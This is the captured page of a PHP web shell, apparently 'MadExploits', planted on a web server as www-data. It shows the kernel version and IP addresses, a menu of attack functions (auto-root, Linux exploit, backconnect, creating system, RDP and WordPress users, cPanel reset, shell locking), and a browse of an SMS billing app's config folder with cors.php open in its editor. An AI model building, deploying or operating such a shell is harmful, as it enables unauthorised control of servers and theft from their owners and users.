Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-billing-app /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
auth.php
609
B
-rwxrwxr-x
cache.php
2.77
KB
-rw-rw-r--
cors.php
822
B
-rwxrwxr-x
database.php
4.53
KB
-rwxrwxr-x
hashids.php
1.37
KB
-rwxrwxr-x
localization.php
219
B
-rwxrwxr-x
logging.php
1.92
KB
-rw-rw-r--
modules.php
7.87
KB
-rw-rw-r--
queue.php
2.68
KB
-rw-rw-r--
services.php
3.95
KB
-rwxrwxr-x
setting.php
474
B
-rwxrwxr-x
swagger-lume.php
8.54
KB
-rwxrwxr-x
throttle.php
732
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cors.php
<?php return [ /* |-------------------------------------------------------------------------- | Cross-Origin Resource Sharing (CORS) Configuration |-------------------------------------------------------------------------- | | Here you may configure your settings for cross-origin resource sharing | or "CORS". This determines what cross-origin operations may execute | in web browsers. You are free to adjust these settings as needed. | | To learn more: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS | */ 'paths' => ['api/*'], 'allowed_methods' => ['*'], 'allowed_origins' => ['*'], 'allowed_origins_patterns' => [], 'allowed_headers' => ['*'], 'exposed_headers' => [], 'max_age' => 0, 'supports_credentials' => false, ];
Close